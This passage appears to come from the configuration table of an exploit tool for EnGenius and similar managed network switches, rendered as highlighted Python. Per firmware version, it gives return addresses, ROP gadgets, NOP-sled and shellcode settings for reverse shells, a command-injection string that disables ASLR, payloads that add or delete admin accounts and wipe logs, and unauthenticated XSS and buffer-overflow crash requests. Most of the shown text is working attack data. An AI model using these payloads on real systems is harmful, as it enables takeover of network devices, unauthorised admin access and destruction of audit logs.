						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x42382C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># pt: 0 = no password, 1 = cleartext, 2 = encrypted</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x423E74</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pw=PASSWORD&amp;pwn=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x423E74</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x43DE18</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x43F934</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x43F934</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x424844</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x424844</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x424844</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x100181A0</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># EnGenius Technologies, Inc.</span>
			<span class="token comment"># EWS series</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'14044-32589'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'EnGenius'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.06.21_c1.8.77_180906-0716'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'EWS1200-28TFP'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/'</span><span class="token punctuation">,</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'cpl_locallogin.cgi (XSS)'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'xss'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_locallogin.cgi?redirecturl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;userurl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;loginurl=&lt;script&gt;alert(XSS);&lt;/script&gt;'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;password=&lt;script&gt;alert(XSS);&lt;/script&gt;'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.login (XSS)'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'XSS in "userurl &amp; uamip" (PoC: Count passed XSS)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'xss'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.login?cmd=action'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'mac=dummy&amp;res=dummy&amp;userurl=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;uamip=&lt;script&gt;alert(XSS);&lt;/script&gt;&amp;alertmsg=dummy&amp;called=dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'cpl_logo_ul.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'json'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_logo_ul.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Disposition: filename.png\n------'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'cpl_locallogin.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&amp;userurl=BBBB&amp;loginurl=BBBB'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">196</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "called", XSS in "userurl &amp; uamip" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.login?cmd=action'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'mac=dummy&amp;res=dummy&amp;userurl=dummy&amp;uamip=dummy&amp;alertmsg=dummy&amp;called='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">4100</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.jrpc.dispatch.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.jrpc.dispatch.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"'</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'"},"method":"login"}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sn.captivePortal.auth'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn.captivePortal.auth?user=admin&amp;chap_chal=challenge&amp;chap_pass='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">140</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E15C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24840690</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">6</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># pt: 0 = no password, 1 = cleartext, 2 = encrypted</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x42D1D4</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pw=PASSWORD&amp;pwn=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x42D1D4</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pt=2&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x42CB8C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x4494E8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x44B0C0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x44B0C0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42E438</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42E438</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42E438</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'nop=nop&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x100271A0</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token string">'14044-44104'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'EnGenius'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.07.22_c1.9.21_181018-0228'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'EWS1200-28TFP'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/'</span><span class="token punctuation">,</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'cpl_locallogin.cgi (XSS)'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'xss'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
